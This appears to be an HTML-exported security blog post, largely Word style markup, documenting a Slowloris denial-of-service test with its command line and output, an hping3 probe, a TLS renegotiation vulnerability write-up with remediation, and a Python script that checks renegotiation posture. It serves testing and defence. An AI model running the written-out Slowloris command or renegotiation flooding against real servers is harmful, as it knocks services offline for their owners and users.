<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Contemporary"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Elegant"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Professional"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Balloon Text"/>
<w:LsdException Locked="false" Priority="59" Name="Table Grid"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Theme"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" QFormat="true"
Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" QFormat="true"
Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" QFormat="true"
Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" QFormat="true"
Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" QFormat="true"
Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" QFormat="true"
Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" SemiHidden="true"
UnhideWhenUsed="true" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="TOC Heading"/>
<w:LsdException Locked="false" Priority="41" Name="Plain Table 1"/>
<w:LsdException Locked="false" Priority="42" Name="Plain Table 2"/>
<w:LsdException Locked="false" Priority="43" Name="Plain Table 3"/>
<w:LsdException Locked="false" Priority="44" Name="Plain Table 4"/>
<w:LsdException Locked="false" Priority="45" Name="Plain Table 5"/>
<w:LsdException Locked="false" Priority="40" Name="Grid Table Light"/>
<w:LsdException Locked="false" Priority="46" Name="Grid Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="Grid Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="Grid Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="46" Name="List Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="List Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="List Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 6"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin-top:0cm;
mso-para-margin-right:0cm;
mso-para-margin-bottom:8.0pt;
mso-para-margin-left:0cm;
line-height:107%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-fareast-language:EN-US;}
</style>
<![endif]-->
<br />
<pre style="font-size: x-small;">
<span style="background: yellow;">./slowloris.pl -dns xxx.xxx.xxx -port 80 -timeout 2000 -num 100 -tcpto 5</span>
CCCCCCCCCCOOCCOOOOO888@8@8888OOOOCCOOO888888888@@@@@@@@@8@8@@@@888OOCooocccc::::
CCCCCCCCCCCCCCCOO888@888888OOOCCCOOOO888888888888@88888@@@@@@@888@8OOCCoococc:::
CCCCCCCCCCCCCCOO88@@888888OOOOOOOOOO8888888O88888888O8O8OOO8888@88@@8OOCOOOCoc::
<b>…[omitted]…</b>
<span style="background: yellow;">Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP client</span>
Multithreading enabled.
<span style="background: yellow;">Connecting to xxx.xxx.xxx:80 every 2000 seconds with 100 sockets:</span>
Building sockets.
Building sockets.
Sending data.
<span style="background: yellow;">Current stats: Slowloris has now sent 446 packets successfully.</span>
This thread now sleeping for 2000 seconds...
</pre>
<div class="MsoNormal" style="margin-left: 0cm;">
<br /></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span style="font-size: x-small;"><span lang="EN-US">
Sending data.</span></span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span style="font-size: x-small;"><span lang="EN-US" style="background: none repeat scroll 0% 0% yellow;">Current
stats: Slowloris has now sent 500
packets successfully.</span><span lang="EN-US"></span></span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span style="font-size: x-small;"><span lang="EN-US">This thread now sleeping for 2000 seconds...</span></span></div>
<br />
<br />
<u>Hping3 output</u><br />
<br />
<span style="font-size: x-small;"> hping3 -T -p 80 xxx.xxx.xxx</span><br />
<span style="font-size: x-small;"><br />HPING xxx.xxx.xxx (eth1 xxx.xxx.xxx): NO FLAGS are set, 40 headers + 0 data bytes<br />hop=1 TTL 0 during transit from ip=xxx.xxx.xx. name=xxx<br />hop=1 hoprtt=0.6 ms<br /><b>...[omitted]...</b><br />--- 192.168.0.2 hping statistic ---<br /><span style="background-color: yellow;">10 packets transmitted, 21 packets received, 0% packet loss</span></span><br />
<br />
<b>Explanation </b><br />
<br />
In this scenario we sent a low burst of packets using Slowloris and then launched hping3 against port 80 (the same port Slowloris was targeting). Because Slowloris had opened so many connections, we observed that we were receiving more packets than we sent (10 transmitted, 21 received in the hping3 statistics above).<br />
<br />
<b>TLS Protocol Session Renegotiation Security Vulnerability</b><br />
<br />
The TLS protocol is prone to a security vulnerability that allows man-in-the-middle attacks and Denial of Service attacks. This issue does not allow attackers to decrypt encrypted data. More specifically, the issue lies in the way applications handle the session renegotiation process and may allow attackers to inject arbitrary plaintext at the beginning of the application protocol stream. <br />
<br />
<ul>
<li>In the case of the HTTP protocol used with a vulnerable TLS implementation, this attack is carried out by intercepting 'Client Hello' requests and then forcing session renegotiation. An unauthorized attacker can then cause the web server to process arbitrary requests that would otherwise require a valid client-side certificate for authorization. The attacker will not be able to gain direct access to the server's response.</li>
<li>A Denial of Service attack is also feasible. This attack further abuses the SSL secure renegotiation feature to trigger thousands of renegotiations over a single TCP connection and crash the service.</li>
</ul>
<br />
<b>Business Impact</b><br />
<br />
An adversary can potentially exploit the vulnerability and compromise the confidentiality and availability of the vulnerable service. <br />
<br />
<b>Remediation</b><br />
<br />
<u>Man In The Middle Attack:</u><br />
<br />
<ul>
<li>OpenSSL workaround - OpenSSL has provided a version (0.9.8l) that contains a workaround. Please refer to the OpenSSL Change Log (Changes between 0.9.8k and 0.9.8l section).</li>
<li>Microsoft workaround - Enable SSLAlwaysNegoClientCert on IIS 6 and above: web servers running IIS 6 and later that are affected because they require mutual authentication by requesting a client certificate can be hardened by enabling the SSLAlwaysNegoClientCert setting. This causes IIS to prompt the client for a certificate upon the initial connection, so that no server-initiated renegotiation is required.</li>
</ul>
For the Denial of Service attack, no real solution exists. The following steps can mitigate (but not solve) the problem:<br />
<br />
<ul>
<li>Disable SSL-Renegotiation</li>
<li>Install SSL Accelerator</li>
</ul>
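<br />
As an added verification step (example code written for this post, not the original author's and not part of OpenSSL), the script below classifies a server's renegotiation posture from the output of openssl s_client: it flags legacy renegotiation, recognises the RFC 5746 secure renegotiation extension that the fixed implementations advertise, and treats TLS 1.3 (which has no renegotiation at all) as not applicable rather than as a finding. The function names, the placeholder host and the sample transcripts are constructed.<br />

```python
"""Classify a server's TLS renegotiation posture from `openssl s_client` output.

Added example for this post (not the author's or OpenSSL's code).
After the handshake, openssl s_client prints exactly one of:
    Secure Renegotiation IS supported       (RFC 5746 extension present)
    Secure Renegotiation IS NOT supported   (legacy renegotiation, or TLS 1.3)
Because TLS 1.3 removed renegotiation entirely, the "IS NOT supported" line
must be read together with the negotiated protocol to avoid a false finding.
"""
import re
import subprocess
from dataclasses import dataclass
from typing import Optional

# Verdict line as printed by openssl s_client; the optional "NOT " group decides the result.
SECURE_RENEG_RE = re.compile(r"^Secure Renegotiation IS (NOT )?supported\s*$", re.MULTILINE)
# "    Protocol  : TLSv1.2" inside the SSL-Session block.
PROTOCOL_RE = re.compile(r"^\s*Protocol\s*:\s*(\S+)", re.MULTILINE)

MESSAGES = {
    "legacy": "FINDING: server offers only legacy renegotiation (RFC 5746 absent); "
              "plaintext injection through a MitM-forced renegotiation is possible",
    "secure": "OK: RFC 5746 secure renegotiation supported",
    "tls13": "N/A: TLS 1.3 negotiated, renegotiation does not exist in this version",
    "unknown": "INCONCLUSIVE: no renegotiation verdict in s_client output (handshake failed?)",
}


@dataclass
class RenegotiationReport:
    secure_renegotiation: Optional[bool]  # None when s_client printed no verdict line
    protocol: Optional[str]               # e.g. "TLSv1.2"; None if the session block is missing

    @property
    def status(self) -> str:
        if self.secure_renegotiation is None:
            return "unknown"
        if self.protocol == "TLSv1.3":
            return "tls13"  # openssl prints "IS NOT supported" here, but nothing is wrong
        return "secure" if self.secure_renegotiation else "legacy"

    @property
    def message(self) -> str:
        return MESSAGES[self.status]


def parse_s_client_output(text: str) -> RenegotiationReport:
    """Parse the text that openssl s_client writes to stdout for one connection."""
    m = SECURE_RENEG_RE.search(text)
    secure = None if m is None else (m.group(1) is None)
    p = PROTOCOL_RE.search(text)
    return RenegotiationReport(secure, p.group(1) if p else None)


def check_server(host: str, port: int = 443, timeout: int = 15) -> RenegotiationReport:
    """Connect once with the openssl binary and classify the answer (hypothetical helper)."""
    proc = subprocess.run(
        ["openssl", "s_client", "-connect", f"{host}:{port}", "-servername", host],
        input=b"", capture_output=True, timeout=timeout,
    )
    return parse_s_client_output(proc.stdout.decode(errors="replace"))


# Constructed sample transcripts (abbreviated s_client output, not from real hosts).
SAMPLE_LEGACY = """CONNECTED(00000003)
---
New, TLSv1/SSLv3, Cipher is AES128-SHA
Server public key is 2048 bit
Secure Renegotiation IS NOT supported
Compression: NONE
SSL-Session:
    Protocol  : TLSv1
    Cipher    : AES128-SHA
---
"""
SAMPLE_PATCHED = SAMPLE_LEGACY.replace("IS NOT supported", "IS supported").replace("TLSv1\n", "TLSv1.2\n")
SAMPLE_TLS13 = SAMPLE_LEGACY.replace("TLSv1\n", "TLSv1.3\n")

if __name__ == "__main__":
    for name, sample in [("legacy", SAMPLE_LEGACY), ("patched", SAMPLE_PATCHED), ("tls13", SAMPLE_TLS13)]:
        print(f"{name:8s} -> {parse_s_client_output(sample).message}")
    # Live check against your own host (placeholder name, replace before use):
    # print(check_server("server.example.invalid").message)
```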
<b>Example</b><br />
<br />
<!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="false"
DefSemiHidden="false" DefQFormat="false" DefPriority="99"
LatentStyleCount="371">
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="46" Name="List Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="List Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="List Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 1"/>
